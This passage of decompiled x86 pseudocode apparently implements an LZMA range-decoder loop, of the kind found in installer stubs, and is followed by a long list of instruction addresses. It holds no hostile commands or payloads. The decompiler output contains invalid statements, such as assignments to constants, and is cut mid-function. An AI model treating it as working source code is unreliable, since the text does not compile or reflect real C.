													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00000000
                                                              0x00406f61
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x0040700d
                                                              0x0040700d
                                                              0x0040700d
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x00000000
                                                              0x00407195
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00407007
                                                              0x00407007
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00000000
                                                              0x004069b2
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x0040698e
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00000000
                                                              0x00406cfd
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x00000000
                                                              0x00407048
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
